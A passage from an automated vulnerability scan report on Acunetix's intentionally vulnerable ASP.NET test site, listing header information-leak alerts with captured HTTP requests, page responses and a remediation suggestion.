28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        12. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 22752
          
          
          Response body (22752 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+dfic04fJFrwdgOeBd3JBjK63E5g==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        13. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
